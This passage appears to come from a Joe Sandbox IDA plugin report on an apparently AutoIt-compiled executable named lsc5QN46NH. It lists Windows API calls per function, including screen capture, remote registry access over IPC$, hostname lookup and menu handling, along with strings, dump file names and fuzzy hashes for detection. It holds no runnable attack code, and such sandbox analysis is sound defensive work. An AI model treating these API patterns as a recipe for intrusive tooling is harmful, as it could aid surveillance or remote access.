                                                                                                                  • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0068C1FC
                                                                                                                • GetFocus.USER32 ref: 0068C20C
                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 0068C217
                                                                                                                • _memset.LIBCMT ref: 0068C342
                                                                                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0068C36D
                                                                                                                • GetMenuItemCount.USER32(?), ref: 0068C38D
                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 0068C3A0
                                                                                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0068C3D4
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0068C41C
                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0068C454
                                                                                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0068C489
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1296962147-4108050209
                                                                                                                • Opcode ID: 66027258d3881f8e03595147e454b880966260d8738ba30306f121134c96caaf
                                                                                                                • Instruction ID: 04e503479777ed58830903f9b2a68cd9d1505a4f53bc68ccd949b680d294c47f
                                                                                                                • Opcode Fuzzy Hash: 66027258d3881f8e03595147e454b880966260d8738ba30306f121134c96caaf
                                                                                                                • Instruction Fuzzy Hash: 43816D70608311AFD710EF14D894EBBBBE6FB88724F004A2DF99597291D770D945CBA2
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 0067738F
                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0067739B
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 006773A7
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 006773B4
                                                                                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00677408
                                                                                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00677444
                                                                                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00677468
                                                                                                                • SelectObject.GDI32(00000006,?), ref: 00677470
                                                                                                                • DeleteObject.GDI32(?), ref: 00677479
                                                                                                                • DeleteDC.GDI32(00000006), ref: 00677480
                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 0067748B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                • String ID: (
                                                                                                                • API String ID: 2598888154-3887548279
                                                                                                                • Opcode ID: f736124841dd2695fe476a88c6efcdbc56c34ad9e35092a04e72c733e4deda57
                                                                                                                • Instruction ID: 670dc5f12278f8f2bb3d69c6584e11d43c980b9e076143b8e655024b6f8701c2
                                                                                                                • Opcode Fuzzy Hash: f736124841dd2695fe476a88c6efcdbc56c34ad9e35092a04e72c733e4deda57
                                                                                                                • Instruction Fuzzy Hash: 7C514975904309EFCB14CFA8DC84EAEBBBAEF48310F14852DF99997211D771A940CB50
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00620957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00606B0C,?,00008000), ref: 00620973
                                                                                                                  • Part of subcall function 00604750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00604743,?,?,006037AE,?), ref: 00604770
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00606BAD
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00606CFA
                                                                                                                  • Part of subcall function 0060586D: _wcscpy.LIBCMT ref: 006058A5
                                                                                                                  • Part of subcall function 0062363D: _iswctype.LIBCMT ref: 00623645
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                • API String ID: 537147316-1018226102
                                                                                                                • Opcode ID: 8136b30e1e8b8f64e63a0245841e2bef99711236bb5f8f19ff2776ce4b1cbab8
                                                                                                                • Instruction ID: 24fea9e38f0788b183e938e175e8d9142eeb006de6e4171bf57fec4cee5afe14
                                                                                                                • Opcode Fuzzy Hash: 8136b30e1e8b8f64e63a0245841e2bef99711236bb5f8f19ff2776ce4b1cbab8
                                                                                                                • Instruction Fuzzy Hash: 2302AB705483419FC768EF20C8819AFBBE6EF99314F10491DF486972E2DB31EA49CB56
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00662D50
                                                                                                                • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00662DDD
                                                                                                                • GetMenuItemCount.USER32(006C5890), ref: 00662E66
                                                                                                                • DeleteMenu.USER32(006C5890,00000005,00000000,000000F5,?,?), ref: 00662EF6
                                                                                                                • DeleteMenu.USER32(006C5890,00000004,00000000), ref: 00662EFE
                                                                                                                • DeleteMenu.USER32(006C5890,00000006,00000000), ref: 00662F06
                                                                                                                • DeleteMenu.USER32(006C5890,00000003,00000000), ref: 00662F0E
                                                                                                                • GetMenuItemCount.USER32(006C5890), ref: 00662F16
                                                                                                                • SetMenuItemInfoW.USER32(006C5890,00000004,00000000,00000030), ref: 00662F4C
                                                                                                                • GetCursorPos.USER32(?), ref: 00662F56
                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00662F5F
                                                                                                                • TrackPopupMenuEx.USER32(006C5890,00000000,?,00000000,00000000,00000000), ref: 00662F72
                                                                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00662F7E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3993528054-0
                                                                                                                • Opcode ID: dfbf94aa3e73bcff70cf528ffeba73b46830c8759e5d68a8bb10ee9738571854
                                                                                                                • Instruction ID: 0aae22f7e720f112032d0d078f6aa8840262b542f63873210fe0f0af8d8671a5
                                                                                                                • Opcode Fuzzy Hash: dfbf94aa3e73bcff70cf528ffeba73b46830c8759e5d68a8bb10ee9738571854
                                                                                                                • Instruction Fuzzy Hash: 3671F570641A07BBEB219F54DC69FEABF6AFF04314F100226F615AA2E0C7725C60DB95
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 006788D7
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00678904
                                                                                                                • CoUninitialize.OLE32 ref: 0067890E
                                                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 00678A0E
                                                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00678B3B
                                                                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00692C0C), ref: 00678B6F
                                                                                                                • CoGetObject.OLE32(?,00000000,00692C0C,?), ref: 00678B92
                                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 00678BA5
                                                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00678C25
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00678C35
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                • String ID: ,,i
                                                                                                                • API String ID: 2395222682-3276395716
                                                                                                                • Opcode ID: 8e5319aa2c5fe81dab8bdde0b6bfa6484ff054b473f663180ba8ea0cd99340ff
                                                                                                                • Instruction ID: 997a86ceec281e6b946a5b1d84f369c1fea042bf7ac2c6c6c8012c235ad9671d
                                                                                                                • Opcode Fuzzy Hash: 8e5319aa2c5fe81dab8bdde0b6bfa6484ff054b473f663180ba8ea0cd99340ff
                                                                                                                • Instruction Fuzzy Hash: 5CC127B1604305AFD700DF28C88896BB7EAFF89748F00895DF9899B251DB71ED06CB52
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06
                                                                                                                • _memset.LIBCMT ref: 0065786B
                                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006578A0
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006578BC
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006578D8
                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00657902
                                                                                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0065792A
                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00657935
                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0065793A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                • API String ID: 1411258926-22481851
                                                                                                                • Opcode ID: 23ada40951fac5400f0b64de67f2dfd82d2e109fca1db5c3bc1f5369d33fc8e2
                                                                                                                • Instruction ID: 059d93d288d16b3b8665d4fc90cd7aa04806418c0e7d2f368c890e8d11d7d62c
                                                                                                                • Opcode Fuzzy Hash: 23ada40951fac5400f0b64de67f2dfd82d2e109fca1db5c3bc1f5369d33fc8e2
                                                                                                                • Instruction Fuzzy Hash: 67411972C54229AECF15EFA4EC55DEEB77ABF04314F004129E905A32A1DB316E08CBA4
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0067FDAD,?,?), ref: 00680E31
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper
                                                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                • API String ID: 3964851224-909552448
                                                                                                                • Opcode ID: 588e120682e037abeb91ee2d970aed7e1cdadecb205afc03882f21224d5943d0
                                                                                                                • Instruction ID: 59ba3428da1cecc4ff5e1f2f028ea4d39c69f6e117ba0544c30a69cb58440162
                                                                                                                • Opcode Fuzzy Hash: 588e120682e037abeb91ee2d970aed7e1cdadecb205afc03882f21224d5943d0
                                                                                                                • Instruction Fuzzy Hash: 9841807114025A8BEFA4EF10E895AEF3763AF11304F548968FE551B293DB309D5ACB60
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0063E2A0,00000010,?,Bad directive syntax error,0068F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0065F7C2
                                                                                                                • LoadStringW.USER32(00000000,?,0063E2A0,00000010), ref: 0065F7C9
                                                                                                                  • Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22
                                                                                                                • _wprintf.LIBCMT ref: 0065F7FC
                                                                                                                • __swprintf.LIBCMT ref: 0065F81E
                                                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0065F88D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                • API String ID: 1506413516-4153970271
                                                                                                                • Opcode ID: 9b95f18bb2873d8e9037901abce3617d5a2bab8f4d35904bc643d65d2d1c0f63
                                                                                                                • Instruction ID: fc2c0427950cdaa9c4c1c13c9eb4ae765bf00b9bf61f44ed1d2ef8e85e244012
                                                                                                                • Opcode Fuzzy Hash: 9b95f18bb2873d8e9037901abce3617d5a2bab8f4d35904bc643d65d2d1c0f63
                                                                                                                • Instruction Fuzzy Hash: 5B216D7294021EBFCF15EF90CC0AEEE773ABF18304F04486AF515661A1EA71AA58DB54
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06
                                                                                                                  • Part of subcall function 00607924: _memmove.LIBCMT ref: 006079AD
                                                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00665330
                                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00665346
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00665357
                                                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00665369
                                                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0066537A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: SendString$_memmove
                                                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                • API String ID: 2279737902-1007645807
                                                                                                                • Opcode ID: 6763af3d7938752acbb349f716eb38c8fd4ce1d27195d7dfabc99a2a3820fad6
                                                                                                                • Instruction ID: ba3c0f86d4972637b26387af4608254d267837c5b454134d54cf4bf0fa308fec
                                                                                                                • Opcode Fuzzy Hash: 6763af3d7938752acbb349f716eb38c8fd4ce1d27195d7dfabc99a2a3820fad6
                                                                                                                • Instruction Fuzzy Hash: 40118F71E901697DD764BB61CC4ADFFBBBEEB91F44F100429B402A31D1EEA02D45C6A4
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                • String ID: 0.0.0.0
                                                                                                                • API String ID: 208665112-3771769585
                                                                                                                • Opcode ID: 535f9779364300f189a05ab9cff7c1b28d6e7d19eb45ff6286cc95071dd0b37f
                                                                                                                • Instruction ID: 6141a3f7097b7fc253f54a86ddccada38957f232eccadd3b3d2b20e28ae9d771
                                                                                                                • Opcode Fuzzy Hash: 535f9779364300f189a05ab9cff7c1b28d6e7d19eb45ff6286cc95071dd0b37f
                                                                                                                • Instruction Fuzzy Hash: BE11E471504115BFDB60AB30EC4AEEA7BBEEF02711F0406BAF44596191FF719AC28B54
                                                                                                                APIs
                                                                                                                • timeGetTime.WINMM ref: 00664F7A
                                                                                                                  • Part of subcall function 0062049F: timeGetTime.WINMM(?,76C1B400,00610E7B), ref: 006204A3
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00664FA6
                                                                                                                • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00664FCA
                                                                                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00664FEC
                                                                                                                • SetActiveWindow.USER32 ref: 0066500B
                                                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00665019
                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00665038
                                                                                                                • Sleep.KERNEL32(000000FA), ref: 00665043
                                                                                                                • IsWindow.USER32 ref: 0066504F
                                                                                                                • EndDialog.USER32(00000000), ref: 00665060
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                • String ID: BUTTON
                                                                                                                • API String ID: 1194449130-3405671355
                                                                                                                • Opcode ID: 4f90701e344ed8c4a01f79d582b19ae301acaa099895f58cdbdd1a3de0748420
                                                                                                                • Instruction ID: 7bc36d4c609671bacbdaa037222ecb2bb8b0470a026d6f1d117bd67a52f0d578
                                                                                                                • Opcode Fuzzy Hash: 4f90701e344ed8c4a01f79d582b19ae301acaa099895f58cdbdd1a3de0748420
                                                                                                                • Instruction Fuzzy Hash: B5218C70204605BFE7106F60EC89E763BABEB55745F643128F103822B1DB71DE908B66
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
                                                                                                                  • Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC
                                                                                                                • CoInitialize.OLE32(00000000), ref: 0066D5EA
                                                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0066D67D
                                                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 0066D691
                                                                                                                • CoCreateInstance.OLE32(00692D7C,00000000,00000001,006B8C1C,?), ref: 0066D6DD
                                                                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0066D74C
                                                                                                                • CoTaskMemFree.OLE32(?,?), ref: 0066D7A4
                                                                                                                • _memset.LIBCMT ref: 0066D7E1
                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0066D81D
                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0066D840
                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 0066D847
                                                                                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0066D87E
                                                                                                                • CoUninitialize.OLE32(00000001,00000000), ref: 0066D880
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1246142700-0
                                                                                                                • Opcode ID: d42850d29371643ab3b7d3ae2672cf5c2b83f0c9e371b2da154ed6547c954140
                                                                                                                • Instruction ID: adc329acbb3d4c032272cb056be3c1a11f16492650e9e8743f8ee3c0ac0e7492
                                                                                                                • Opcode Fuzzy Hash: d42850d29371643ab3b7d3ae2672cf5c2b83f0c9e371b2da154ed6547c954140
                                                                                                                • Instruction Fuzzy Hash: 44B1EA75A00109AFDB44DFA4C888DAEBBBAEF48314F148569F909EB261DB30ED45CB54
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 0065C283
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0065C295
                                                                                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0065C2F3
                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 0065C2FE
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0065C310
                                                                                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0065C364
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0065C372
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0065C383
                                                                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0065C3C6
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0065C3D4
                                                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0065C3F1
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0065C3FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
